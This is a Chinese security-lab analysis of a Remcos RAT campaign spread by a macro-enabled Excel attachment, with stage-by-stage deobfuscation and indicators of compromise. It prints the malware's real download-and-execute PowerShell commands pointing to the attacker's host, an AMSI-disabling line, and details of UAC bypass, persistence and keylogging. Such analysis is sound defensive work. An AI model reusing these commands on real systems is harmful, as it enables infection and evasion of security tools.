最新版 Remcos 远控正在利用 Office 文件传播
2021-02-02 20:14:55 Author: www.freebuf.com(查看原文) 阅读量:150 收藏

一、概述

近日,兰云科技银河实验室通过 "兰眼下一代威胁感知系统" 发现了一封邮件中内嵌的 Office 文档通过宏命令来传播最新版的 Remcos 远控木马 (截止本文写作时),邮件附件检测结果如下所示:

image

Remcos 远控最早可追溯到 2016 年,直到今天,仍比较活跃 (作者一直在不断地更新),现已经更新到了 3.0.0 版 (2021-01-30),此版本为大更新,因为弃用了之前一直在使用的 RC-4 算法 (3.0.0 版本之前),改用了 AES-128。此次传播的 Remcos 远控木马版本号为 2.7.2 (3.0.0 上一个版本,2020-10-22),并且为 Pro 版 (收费版),免费版本目前最高版本为 2.7.0 版,Pro 版目前官方售价如下所示:

image

根所授权方式的不同,价格也不一样,58 欧元至 389 欧元不等。第三方 (Commodity Malware) 售价如下所示:

image

以往的 Remcos 大都是通过触发 Office 漏洞来投递,但是此次并没沿用老套路,而仅仅是利用宏执行 PowerShell 命令后多阶段进行,最终执行 Remcos RAT,整个过程如下所示:

image

二、Office 样本分析

2.1 基本信息

样本基本信息:

image

从上图可看出,此样本是一个仅为 35KB 大小的 XLS 文件,除此之外,还能获取到编辑此文档的作者信息,名为 Eng Moha。

2.2 宏代码分析

按住 shift 键双击打开文档,打开后如下所示:

image

从表面上去看会发现 A 列没显示,尝试往左拉动右下角横条,当拉至最左端松开鼠标时会自动回弹到原来位置,换另一种方式,拉动上方的表格的分栏线往右拖动,Em~~,露出了它的真面目了,如下所示:

image

看到了什么,原来是一段 PowerShell 命令,嵌在了 A5 单元格内,如下所示:

X`E`I|'' nioj- mj$;}))61,_$(61tniot::]trevnoc[(]rahc[{ hcaErof | )'%'(tilpS.ut$=mj$;txet$ nioj-=ut$;)txet$(esreveR::]yarrA[;)(yarrArahCoT.7hg74hg$ = txet$;'27%28%4E%65%27%2B%27%77%2D%27%2B%27%4F%62%27%2B%27%6A%65%27%2B%27%63%74%20%27%2B%20%27%4E%65%27%2B%27%74%2E%27%2B%27%57%27%2B%27%65%62%27%2B%27%43%27%2B%27%6C%69%27%2B%27%65%6E%74%29%27%2B%27%2E%44%27%2B%27%6F%77%27%2B%27%6E%6C%27%2B%27%6F%61%27%2B%27%64%27%2B%27%46%27%2B%27%69%6C%27%2B%27%65%28%27%27%68%74%74%70%3A%2F%2F%61%76%65%6E%74%75%72%61%6D%6F%74%6F%72%68%6F%6D%65%2E%63%6F%6D%2F%77%70%72%6C%2F%68%6F%6D%65%2F%50%72%6F%74%65%63%74%65%64%2E%76%62%73%27%27%2C%24%65%6E%76%3A%41%50%50%44%41%54%41%2B%27%27%5C%6E%6F%74%65%70%61%64%2E%76%62%73%27%27%29%27%7C%49%60%45%60%58%3B%20%73%74%61%72%74%2D%70%72%6F%63%65%73%73%28%24%65%6E%76%3A%41%50%50%44%41%54%41%2B%20%27%5C%6E%6F%74%65%70%61%64%2E%76%62%73%27%29'=7hg74hg$ llehsrewoP

这段 PowerShell 命令看起来有点怪,仔细去看会发现是被反转了而且还混淆了,这个暂且先放在一边。下面我们来看下它所包含的宏,如下所示:

image

以上为兰眼下一代威胁感知系统对其抽取出来的宏代码,宏代码混淆了,虽然代码量少但它最终要做的事却大:

image

当激活工作簿时会触发 Workbook_Activate() 执行,主要执行两个函数,分别为 sVyI() 和 fjdfk(),前者将后者返回的值作为参数传递进行运算,fjdfk() 函数主要是将嵌入在 A5 单元格中的混淆 PowerShell 命令反转再处理,为了方便显示 fjdfk 变量最后的值,在动态调试中加入 Debug.Print,这样就能在立即窗口中显示出来了,如下所示:

image

处理过后的 PowerShell 命令如下:

Powershell $gh47gh7='92%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%02%B3%85%06%54%06%94%C7%72%92%72%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%72%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%C2%72%72%37%26%67%E2%46%56%47%36%56%47%F6%27%05%F2%56%D6%F6%86%F2%C6%27%07%77%F2%D6%F6%36%E2%56%D6%F6%86%27%F6%47%F6%D6%16%27%57%47%E6%56%67%16%F2%F2%A3%07%47%47%86%72%72%82%56%72%B2%72%C6%96%72%B2%72%64%72%B2%72%46%72%B2%72%16%F6%72%B2%72%C6%E6%72%B2%72%77%F6%72%B2%72%44%E2%72%B2%72%92%47%E6%56%72%B2%72%96%C6%72%B2%72%34%72%B2%72%26%56%72%B2%72%75%72%B2%72%E2%47%72%B2%72%56%E4%72%02%B2%72%02%47%36%72%B2%72%56%A6%72%B2%72%26%F4%72%B2%72%D2%77%72%B2%72%56%E4%82%72';$text = $gh47gh7.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X

最后创建 WScript.Shell 对象 (F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 为 WScript.Shell 的 CLSID) 并调用 Run 方法运行 PowerShell 命令,如下:

GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B").Run 上述PowerShell命令, 0

为了想知道第一阶段的 PowerShell 命令具体做了哪些事,我们必须对其进行动态调试,如下所示:

image

代码稍做了些调整,为了方便调试看结果,从上图可以看出 $test 变量的值,并出现了一个网址,解出来的命令如下:

'(Ne'+'w-'+'Ob'+'je'+'ct '+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'F'+'il'+'e(''http://aventuramotorhome.com/wprl/home/Protected.vbs'',$env:APPDATA+''\notepad.vbs'')'|I`E`X; start-process($env:APPDATA+ '\notepad.vbs')

去混淆后如下:

(New-Object Net.WebClient).DownloadFile(''http://aventuramotorhome.com/wprl/home/Protected.vbs'',$env:APPDATA+''\notepad.vbs'')|IEX; start-process($env:APPDATA+ '\notepad.vbs')

此段命令会从 http[:]//aventuramotorhome.com/wprl/home/Protected.vbs 下载文件,如下所示:

image

下载后会存放在 C:\User\用户名\AppData\Roaming 下并重命名为 notepad.vbs,最后将其启动:

image

notepad.vbs 内容如下:

image

三、邪恶的 notepad.vbs

notepad.vbs 也被混淆了,同样也需要清楚这个 vbs 脚本具体做了些什么,因此还得动态调试它,如下所示:

image

为 wscript 添加 /x 参数来启动调试,调试命令如下:

wscript /x notepad.vbs

启动后自动中断到第一行处,如下所示:

image

在这个 VBS 脚本文件中,其中最重要的是 pexGRQLd() 和 URTSYOemNS() 这两个函数,如下所示:

image

pexGRQLd() 函数主要是为设置一个自启动项,在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 创建一个名为 ubYietxJ 项,其值为 C:\Users\zeronohacker\AppData\Local\notepad.vbs,如下所示:

image

相关实现代码如下所示:

image

atSSHJiye 变量的值为 &H8000001,表示的是 HKEY_CURRENT_USER 这个根,利用在 root\default 命名空间中的 StdRegProv 类 (标准注册表提供程序) 来实现对注册表进行操作,在运行 URTSYOemNS() 函数后,会启动一个 PowerShell 进程,如下所示:

image

通过 Process Explorer 对进程进行监控可知,启动的 PowerShell 进程的参数经过了混淆,将参数 dump 出来,如下所示:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  Set-PSReadlineOption -HistorySaveStyle SaveNothing;$JqmGSYFdciEMkrojOGsg='Q4*QF*20*7B*24*70*Q9*QE*Q7*20*3D*20*74*QO*73*74*2D*Q3*QF*QE*QE*QO*Q3*74*Q9*QF*QE*20*2D*Q3*QF*QD*70*20*Q7*QF*QF*Q7*QC*QO*2E*Q3*QF*QD*20*2D*Q3*QF*7O*QE*74*20*31*20*2D*O1*7O*Q9*QO*74*7D*20*7O*QE*74*Q9*QC*20*28*24*70*Q9*QE*Q7*29*3B*24*74*3O*3Q*QQ*Q7*20*3D*20*OB*4O*QE*7O*QD*OD*3A*3A*O4*QF*4F*Q2*QA*QO*Q3*74*28*OB*O3*79*73*74*QO*QD*2E*4E*QO*74*2E*O3*QO*Q3*7O*72*Q9*74*79*O0*72*QF*74*QF*Q3*QF*QC*O4*79*70*QO*OD*2C*20*33*30*37*32*29*3B*OB*O3*79*73*74*QO*QD*2E*4E*QO*74*2E*O3*QO*72*7Q*Q9*Q3*QO*O0*QF*Q9*QE*74*4D*Q1*QE*Q1*Q7*QO*72*OD*3A*3A*O3*QO*Q3*7O*72*Q9*74*79*O0*72*QF*74*QF*Q3*QF*QC*20*3D*20*24*74*3O*3Q*QQ*Q7*3B*OB*O2*QO*QQ*OD*2E*41*73*73*QO*QD*Q2*QC*79*2E*47*QO*74*O4*79*70*QO*28*27*O3*79*27*2B*27*73*74*QO*QD*2E*27*2B*27*4D*Q1*QE*Q1*27*2B*27*Q7*QO*QD*27*2B*27*QO*QE*74*27*2B*27*2E*41*7O*74*QF*QD*27*2B*27*Q1*74*Q9*QF*27*2B*27*QE*2E*41*27*2B*27*QD*27*2B*27*73*Q9*27*2B*27*OO*74*Q9*QC*73*27*29*2E*47*QO*74*4Q*Q9*QO*QC*Q4*28*27*Q1*27*2B*27*QD*73*27*2B*27*Q9*49*27*2B*27*QE*Q9*74*4Q*Q1*27*2B*27*Q9*QC*QO*Q4*27*2C*27*4E*QF*QE*40*40*40*27*2E*72*QO*70*QC*Q1*Q3*QO*28*27*40*40*40*27*2C*27*O0*7O*Q2*27*29*2B*27*QC*Q9*Q3*2C*O3*27*2B*27*74*Q1*74*Q9*Q3*27*29*2E*O3*QO*74*OQ*Q1*QC*7O*QO*28*24*QE*7O*QC*QC*2C*24*74*72*7O*QO*29*3B*24*74*74*79*3D*27*28*4E*QO*77*2D*27*2B*27*4F*Q2*QA*QO*27*2B*27*Q3*74*20*4E*QO*27*2B*27*74*2E*O7*QO*27*2B*27*Q2*43*QC*Q9*27*2B*27*QO*QE*74*29*27*7C*49*Q0*4O*Q0*O8*3B*OB*7Q*QF*Q9*Q4*OD*20*OB*O3*79*73*74*QO*QD*2E*O2*QO*QQ*QC*QO*Q3*74*Q9*QF*QE*2E*41*73*73*QO*QD*Q2*QC*79*OD*3A*3A*4C*QF*Q1*Q4*O7*Q9*74*Q8*O0*Q1*72*74*Q9*Q1*QC*4E*Q1*QD*QO*28*27*4D*Q9*Q3*72*QF*73*QF*QQ*74*2E*OQ*Q9*73*7O*Q1*QC*42*Q1*73*Q9*Q3*27*29*3B*24*QD*7Q*3D*20*OB*4D*Q9*Q3*72*QF*73*QF*QQ*74*2E*OQ*Q9*73*7O*Q1*QC*42*Q1*73*Q9*Q3*2E*49*QE*74*QO*72*Q1*Q3*74*Q9*QF*QE*OD*3A*3A*43*Q1*QC*QC*42*79*QE*Q1*QD*QO*28*24*74*74*79*2C*27*44*QF*77*QE*QC*QF*Q1*Q4*O3*74*72*Q9*QE*Q7*27*2C*OB*4D*Q9*Q3*72*QF*73*QF*QQ*74*2E*OQ*Q9*73*7O*Q1*QC*42*Q1*73*Q9*Q3*2E*43*Q1*QC*QC*O4*79*70*QO*OD*3A*3A*4D*QO*74*Q8*QF*Q4*2C*27*Q8*74*74*70*3B*2F*2F*77*77*77*2E*Q1*7Q*QO*QE*74*7O*72*Q1*QD*QF*74*QF*72*Q8*QF*QD*QO*2E*Q3*QF*QD*2F*77*70*72*QC*2F*Q8*QF*QD*QO*2F*41*74*74*Q1*Q3*QB*2E*QA*70*Q7*27*29*3B*24*72*37*38*QQ*Q4*30*30*30*73*Q4*3D*20*24*QD*7Q*20*2D*73*70*QC*Q9*74*20*27*2O*27*20*7C*4Q*QF*72*4O*Q1*Q3*Q8*2D*4F*Q2*QA*QO*Q3*74*20*7B*OB*Q3*Q8*Q1*72*OD*OB*Q2*79*74*QO*OD*22*30*78*24*OF*22*7D*3B*24*79*3O*QA*Q8*3Q*32*Q4*QQ*30*3D*20*24*72*37*38*QQ*Q4*30*30*30*73*Q4*20*2D*QA*QF*Q9*QE*20*27*27*7C*49*Q0*4O*Q0*O8'.replace('O','5').replace('Q','6');$DFG45DFG0=$JqmGSYFdciEMkrojOGsg.Split('*') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))

相关实现代码如下:

image

其中 QZPVkUf() 函数多次使用到,该函数是将字符串参数进行反转,如下所示:

image

URTSYOemNS() 函数后还有一个小操作,此操作会将 Roaming 目录下的 notepad.vbs 拷贝到 Local 目录下,如下所示:

image

相关命令如下:

cmd /c copy \"C:\\Users\\zeronohacker\\AppData\\Roaming\\notepad.vbs\" \"C:\\Users\\zeronohacker\\AppData\\Local\" /Y

因为之前已经设置了自启动,如果重启后,就会自动执行 Local 目录下的 notepad.vbs,这样变量 Nghi 和 lEyHtnvmj 相等,之后便退出,也就是说重启后就不会执行这一项操作。那上述那段 PowerShell 主要是做什么呢,为了方便调试看结果,代码稍微做了些许调整,如下所示:

image

从上述操作后可得出计算后 $Test 的值,如下:

do {
	$ping = test-connection -comp google.com -count 1 -Quiet
} until($ping);
$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;
[Ref].Assembly.GetType('System.Management.Automtion.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);
$tty='(New-Object Net.WebClient)'|IEX;
[void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');
$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'DownloadString',[Microsoft.VisualBasic.CallType]::Method,'http;//www.aventuramotorhome.com/wprl/home/Attack.jpg');
$r78fd000sd= $mv -split '%' |ForEach-Object {[char][byte]"0x$_"};
$y5jh62df0= $r78fd000sd -join ''|IEX

此段会去远程链接 http[;]//www[.]aventuramotorhome.com/wprl/home/Attack.jpg,其中 http 后跟的不是 : 符号,而是分号,但这不影响连接,如下所示:

image

谷歌浏览器将其拦截,从文件名来看,会让人误以为是图片文件,其实并不是,里面是一堆混乱的字符,如下所示:

image

注意右边下拉条,可见包含的字符量有多大,为了想知道这一大串字符到底是什么,我又对代码做了些调整,如下所示:

$mv = "24%73%64%34%73%64%30%30%30%3D%5B%63%68%61%72%5D%37%33%20%2B%20%5B%63%68%61%72%5D%36%39%20%2B%20%5B%63%68%61%72%5D%38%38%0D%0A%73%61%6C%20%79%30%64%66%35%20%24%73%64%34%73%64%30%30%30%0D%0A%0D%0A%0D%0A%0D%0A%66%75%6E%63%74%69%6F%6E%20%73%46%74%77%7A%77%58%44%20%7B%0D%0A%20%20%20%20%70%61%72%61%6D%28%24%46%49%71%6D%44%54%54%29%0D%0A%20%20%20%20%24%46%49%71%6D%44%54%54%20%3D%20%24%46%49%71%6D%44%54%54%20%2D%73%70%6C%69%74%20%27%28%2E%2E%29%27%20%7C%20%3F......"
$r78fd000sd= $mv -split '%' |ForEach-Object {[char][byte]"0x$_"};
$y5jh62df0= $r78fd000sd -join ''|IEX

在 VS 中新建 PowerShell 工程对上述代码进行调试,如下所示:

image

$y5jh62df0 变量最终得到的值为:

image

注意上图右边下拉条可知,从 Attack.jpg 解密出来的内容也是相当的多,不过从内容上看,倒发现一个亮点,就是 4D5A,难道,Em~~,这一段极大有可能是一个 PE 文件的十六进制代码,只不过混淆了,所以得动态调试得到这段,从代码风格上看这是 PowerShell 代码,最后就是执行了。接下来来调试 $y5jh62df0 变量值的内容,同样也是 PowerShell 代码,如下所示:

image

为了显示得全,我将空行删除了,从上图中,需要关注两个变量的值,一个是 $JRqRizhXK,另一个是 $nsDR2,后面这个变量的值之后会用到,主要是前面这个变量的值,将解混淆后的值复制到另一个文本文件中,如下所示:

image

打开 010Editor,新建一个十六进制文本,如下所示:

image

以十六进制方式粘贴,如下所示:

image

最后保存。再回过头来看本小节的第一图上最后一行代码,如下:

[Waves.YEWODSFM]::Y78HJ0R55('notepad.exe',$nsDR2)

PowerShell 里有 [Waves.YEWODSFM] 这个东西吗?这显然不是 PowerShell 标准里的东西,所以上面那个 PE 文件才是关键,第三阶段的 PowerShell 的任务使命就是执行这个 PE 文件。

四、Waves.dll 分析

4.1 基本信息

将上一小节保存下来的 PE 文件用 DIE 查下基本信息,如下所示:

image

由上图可知,此 PE 文件是用 VB .NET 编写的 32 位 DLL 文件,加了 Confuser 1.X 的壳子。

4.2 提取压缩数据并解压

由于此 DLL 代码写的较简单,大概浏览了一遍,主要功能是将压缩文档数据进行解压,释放到内存中执行 (可绕过检测)。先反汇编简单看下内容,如下所示:

image

通过反汇编信息来看,此 DLL 名为 Waves.dll,结合上一小节最后提到的,会将 notepad.exe 和 $nsDR2 作为 Y78HJ0R55 的参数来执行,notepad.exe 是正常程序,从内容上看,会将 $nsDR2 变量的值作为 Gzip 包进行解压,如下所示:

image

在上一小节中通过动态调试可得出 $nsDR2 的值,如下所示:

image

以同样的方式在 010Editor 新建一个十六进制文本文件将其以十六进制方式粘贴进去,最后保存,再将其拖到 DIE 中检测,结果如下所示:

image

Em~~,果然如此,此为一个 Gzip 压缩文档,当在本地用 7zip 解压后,火绒右下角弹出危险提示并将其拦截删除,提示此文件为后门病毒文件 (Backdoor/Remcos.g),我直呼好家伙,如下所示:

image

五、Remcos 远控详细技术细节

5.1 基本信息

关闭火绒重新解压,得到病毒主体,如下所示:

image

病毒主体是用 Visual C++6.0 编译,编译时间为2020-10-25 03:23:17,一个 32 位的 GUI 可执行文件。

5.2 解密资源表

病毒运行后会先去对资源表中 SETTINGS 项进行 RC-4 解密,获取 SETTINGS 资源项大小 (0x280),如下所示:

image

获取大小后动态分配内存,取资源 SETTINGS 项中第 1 个字节 (0x65,RC-4 Key 的长度),将其后的 0x65 大小的数据拷贝到新分配的内存中,如下所示:

image

此区段字节内容为 RC-4 Key。接下来再次动态分配内存,将剩余的 0x280 - 0x65 - 0x1 = 0x21A 个字节拷贝过去,如下所示:

image

这部分内容为待解密内容。接下来便进行 CRC-4 初始化,如下所示:

image

将 0x21A 字节内容通过 sub_403010 进行解密,如下所示:

image

以上两组函数在后面会多次运用到,从上面解密出来的内容看有以下几个关键字符,字符间是用 |...| 分隔,如下:

servr.killwhenabuse1.xyz:1332

rem dns

remcos.exe

Remcos-GLWJ8X

wiki-pedia;solitaire;

Screenshots (截屏相关)

MicRecords (音频记录相关)

45A3E2943B98E10F443D79C5C1F0E2E5 (licence)

10000

到这基本上就可以确定是 Remcos 远控了,版本为 2.7.2 Pro 版,如下所示:

image

截止到编写本文时间,Remcos 官网提供的最新免费版本为 2.7.0,收费版本最新为 3.0.0 版 (2021 年 01 月 30 日发布),此 2.7.2 Pro 版为 2020 年 10 月 22 日发布的,这与编译时间很接近。

5.3 -l 开关为何意

解密完 SETTINGS 资源项内容后,接下来便是判断命令行中是否带有 -l 参数,如果存在 -l 参数,便会生成 licence_code.txt 这个文件,如下所示:

image

手动加上 -l 参数看下这个文本文件中生成了什么内容,如下所示:

image

Em~~,这一串值貌似和从 SETTINGS 解密出来的其中一项相同,基于硬件某项参数生成的?HWID?NO,当在另一台设备以相同操作运行后,得到的值并没有改变,也许是在控件端生成它时为它分配的一个标识,以便知道是谁创建了它,方便管理,因为专业版可以多个人使用。

5.4 创建互斥体

创建一个名为 Remcos_Mutex_Inj 的互斥体来标记是不是在系统已存在,如下所示:

image

5.5 收集系统信息

在完成上述操作后便是加载相应 API 函数,以便用来收集系统信息,如下所示:

image

5.6 绕过 UAC 进行提权

在很早的时候,国外安全研究人员发现了一种能利用 eventvwr 注册表键值的方法来绕过 UAC 的方法,在新版本的 Remcos 中使用到了,此方法是基于 Enigma0x3 的 exploit,它能在 windos 7 (7600) 触发,但是 windows 10 RS2 (15031) 版已修复了该问题,在下图也注意到了 xp 字符,如果 Remcos 在打过相应补丁的 Windows 上运行,它将正常启动,但在 Windows xp 上没有管理员权限,由于 xp 没有 UAC 机制,因此不会触发该利用程序,如下所示:

image

当 eventvwr.exe 启动时,它会检查是否存在一个指定的 bin 文件用来支持 MMC 的snap-in,至于检查是否存在这个文件的方式便是在HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command查找键值,如果该键值存在那么该项内容将能用来绕过 UAC,如果不存在那么系统将会加载默认程序。

5.7 注册表操作

将自身可执行路径经过 RC-4 加密写入到 HKEY_CURRENT_USER\Software\Remcos-GLWJ8X 中,键名为 exepath,同时将之前从资源 SETTINGS 项中解密出来的可能为本体的标识符也写入到了该注册表路径下,键名为 licence,如下所示:

image

5.8 键盘记录操作

创建三个线程,用来将键盘的操作记录到 logs.dat 中,如下所示:

image

将日志文件保存在 Roaming 目录下,执行后结果如下所示:

image

5.9 屏幕操作

创建一个线程,线程回调函数中使用 GDI 类 API 来获得屏幕快照,如下所示:

image

5.10 浏览器操作

sub_407A0A 中创建一个线程,该线程主要作用为清除浏览器登录和 Cookie 信息,如下所示:

image

浏览器包括 IE 浏览器、谷歌浏览器,火狐浏览器,如下所示:

image

除上述对浏览器清理登录和 Cookie 外,还会将自身注入到默认浏览器中,通过读取 HKEY_CLASSES_ROOT\http\shell\open\command 键值来获取默认浏览器,相关代码如下所示:

image

sub_40F3E2 这个函数就为注入实现函数,方式为利用线程执行劫持,如下所示:

image

以上这段代码和 https://github.com/jozemberi/PE-Crypter/blob/master/runPE.hRemcos 代码极为相似,目的是为了自身在内存中加解密执行。在查看免费版的生成器后,其实不单只针对默认浏览器,还可以指定进程,所以在执行上述注入代码前会有以下操作,如下所示:

image

5.11 看门狗功能

看门狗功能可以保护 Remcos 进程,可让关于它的文件和注册表项免受破坏 (即保持注册表持久性)。如果程序意外终止,可恢复 Remcos 功能。这样,远程管理员就可以确保永远不会失去对远程设备的控制权,而如果出现问题,则不必在远程控制的计算机上手动重新启动 Remcos,如下所示:

image

5.12 其它功能

Remcos 还有其它功能,比如文件上传下载,如下所示:

image

还有接收远程命令执行等,功能太多,不一一列举,具体可以去查看 Remcos 免费版界面上选项,虽然有些选项处于灰色状态。

5.13 上传到 C&C

连接 C&C,将文件上传,如下所示:

image

产生的日志如下所示:

image

将 logs.dat 上传到 194[.]5[.]97[.]135 上,端口 1332,这似乎与从 SETTINGS 资源项解密出来的第一个字符有点关系,域名 servr[.]killwhenabuse1.xyz:1332 在 VT 上信息如下所示:

image

六、结论

从 2016 年 7 月份发布第一个版本到至今 (快 5 个年头了) 共发布了 72 个版本,虽然 Remcos 作者声称应用程序仅供合法使用,但从此次样本分析过程来看,仍有不法分子在利用它,Remcos 是一个强大的工具,正在积极开发,增加许多功能。为了与其对抗,各单位组织机构应该意识到这种威胁,尤其是那些不明来历的邮件 (带有附件),更是要慎重,同时,建议提前部署具备高级威胁检测能力的安全产品进行及时监控、防范,降低安全隐患。

七、IoCs

MD5:

0ad06d008becd7e0d1e17820749f9c5d (Payment remittance.xls)

9c242a912c91ca9eccff78d39fb147ab (notepad.vbs)

0868d7221a338270097a2a58cc0348bc (Attack.jpg)

2acfd20201382b2765637f5334bc3281 (Gzip_dump)

5635f45bd2f42b704b252de85fdb919e (Gzip_dump.exe)

C&C:

194.5.97.135:1332

URL:

http[:]//aventuramotorhome.com/wprl/home/Protected.vbs

http[;]//www[.]aventuramotorhome.com/wprl/home/Attack.jpg

servr[.]killwhenabuse1.xyz:1332


文章来源: https://www.freebuf.com/articles/paper/262812.html
如有侵权请联系:admin#unsafe.sh